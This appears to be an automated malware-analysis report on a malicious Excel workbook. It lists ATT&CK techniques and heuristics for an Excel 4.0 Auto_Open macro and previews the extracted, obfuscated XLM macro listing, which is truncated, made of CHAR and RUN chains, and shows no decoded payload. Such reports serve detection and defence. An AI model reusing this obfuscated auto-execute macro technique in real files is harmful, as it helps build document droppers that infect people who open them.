MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a critical finding. The macros utilize the RUN function with obfuscated arguments, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious stages.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 38987 bytes |
SHA-256: ae2ae2ca56d36a88422995554dd2142931c2e0fec59a80891e335cd178a8f5df |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fbQkaRfpY ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d fbQkaRfpY!IN1717 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' fbQkaRfpY,FY3,CHAR(BE1849-77),"" ' fbQkaRfpY,X4,RUN(IY941),"" ' fbQkaRfpY,FY4,RUN(CK1054),"" ' fbQkaRfpY,FX6,CHAR(E1448-77),"" ' fbQkaRfpY,HP6,"",17.00000000000000000000 ' fbQkaRfpY,FX7,RUN(DN767),"" ' fbQkaRfpY,HY7,CHAR(JL989-77),"" ' fbQkaRfpY,DP8,CHAR(Y1090-853),"" ' fbQkaRfpY,HY8,RUN(BC381),"" ' fbQkaRfpY,BR9,"",0.00000000000000000000 ' fbQkaRfpY,DP9,RUN(DU1665),"" ' fbQkaRfpY,DN11,"FORMULA(HW1046&BP793&ER1921&IZ1548&CQ1002&HY576&HQ1172&DA395&GE784&FE1061&IL447&GM1607&GS491&DW1108&JO1071&BL1546&CD878&JF1879&DW1792&IS1187&ET1132&JM1995&FC1581&S821&K259&IZ1522&BG1015&GL812&HP1166&FJ449&DX1650,CB54)","" ' fbQkaRfpY,EV11,CHAR(CG599-853),"" ' fbQkaRfpY,DN12,RUN(EJ1104),"" ' fbQkaRfpY,EV12,RUN(FZ1835),"" ' fbQkaRfpY,IJ12,RUN(HN437),"" ' fbQkaRfpY,DS14,"",128.00000000000000000000 ' fbQkaRfpY,BD18,RUN(HO1845),"" ' fbQkaRfpY,JB21,CHAR(DK128-77),"" ' fbQkaRfpY,JB22,RUN(HJ1919),"" ' fbQkaRfpY,IW29,"",178.00000000000000000000 ' fbQkaRfpY,DV31,RUN(HF723),"" ' fbQkaRfpY,BI33,"",88.00000000000000000000 ' fbQkaRfpY,BB37,"",94.00000000000000000000 ' fbQkaRfpY,FG37,CHAR(DU1553-853),"" ' fbQkaRfpY,FG38,RUN(HH1973),"" ' fbQkaRfpY,DS47,CHAR(JG1507-77),"" ' fbQkaRfpY,DS48,RUN(DV53),"" ' fbQkaRfpY,FZ49,"",954.00000000000000000000 ' fbQkaRfpY,GG49,"",37.00000000000000000000 ' fbQkaRfpY,DD50,CHAR(HH421-77),"" ' fbQkaRfpY,CT51,RUN(CH1477),"" ' fbQkaRfpY,DA51,RUN(FL1799),"" ' fbQkaRfpY,DD51,RUN(FY254),"" ' fbQkaRfpY,EF54,CHAR(CF1363-77),"" ' fbQkaRfpY,EF55,RUN(HZ1594),"" ' fbQkaRfpY,CI57,"",6.00000000000000000000 ' fbQkaRfpY,IX57,CHAR(CK714-77),"" ' fbQkaRfpY,IX58,RUN(JL1943),"" ' fbQkaRfpY,CZ60,"",162.00000000000000000000 ' fbQkaRfpY,IA60,RUN(HC463),"" ' fbQkaRfpY,GC63,"",30.00000000000000000000 ' fbQkaRfpY,BQ64,RUN(GY766),"" ' fbQkaRfpY,CD65,RUN(DH1950),"" ' fbQkaRfpY,CM65,"",11.00000000000000000000 ' fbQkaRfpY,CM66,"",92.00000000000000000000 ' fbQkaRfpY,HM67,"",182.00000000000000000000 ' fbQkaRfpY,HV69,"",98.00000000000000000000 ' fbQkaRfpY,M70,RUN(FB1419),"" ' fbQkaRfpY,FL74,"",187.00000000000000000000 ' fbQkaRfpY,BY76,RUN(FO1125),"" ' fbQkaRfpY,GK89,"",90.00000000000000000000 ' fbQkaRfpY,EE91,"",12.00000000000000000000 ' fbQkaRfpY,DH95,"",18.00000000000000000000 ' fbQkaRfpY,JI106,RUN(T871),"" ' fbQkaRfpY,GP114,"",967.00000000000000000000 ' fbQkaRfpY,CV115,"",19.00000000000000000000 ' fbQkaRfpY,GW115,"",23.00000000000000000000 ' fbQkaRfpY,BG117,"",153.00000000000000000000 ' fbQkaRfpY,GD118,RUN(HD1902),"" ' fbQkaRfpY,HK118,"",41.00000000000000000000 ' fbQkaRfpY,CG120,"",969.00000000000000000000 ' fbQkaRfpY,IG125,"",69.00000000000000000000 ' fbQkaRfpY,DK128,"",185.00000000000000000000 ' fbQkaRfpY,II129,"",162.00000000000000000000 ' fbQkaRfpY,EJ131,"",25.00000000000000000000 ' fbQkaRfpY,ET131,RUN(EB1768),"" ' fbQkaRfpY,M132,"",30.00000000000000000000 ' fbQkaRfpY,FW134,CHAR(U1799-853),"" ' fbQkaRfpY,FW135,RUN(GW1557),"" ' fbQkaRfpY,JB136,RUN(IB930),"" ' fbQkaRfpY,DW137,RUN(BI1771),"" ' fbQkaRfpY,FL139,"",14.00000000000000000000 ' fbQkaRfpY,DR152,"",9.00000000000000000000 ' fbQkaRfpY,FA153,RUN(BD18),"" ' fbQkaRfpY,EC156,CHAR(EN1372-77),"" ' fbQkaRfpY,EC157,RUN(O239),"" ' fbQkaRfpY,CR158,"",954.00000000000000000000 ' fbQkaRfpY,GF161,"",11.00000000000000000000 ' fbQkaRfpY,FR166,"",174.00000000000000000000 ' fbQkaRfpY,CA167,"",87.00000000000000000000 ' fbQkaRfpY,GH174,"",66.00000000000000000000 ' fbQkaRfpY,HK178,CHAR(DX437-77),"" ' fbQkaRfpY,JL178,"",145.00000000000000000000 ' fbQkaRfpY,HK179,RUN(DQ1325),"" ' fbQkaRfpY,EM181,"",12.00000000000000000000 ' fbQkaRfpY,BA184,RUN(HI512),"" ' fbQkaRfpY,EB186,"",94.00000000000000000000 ' fbQkaR ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.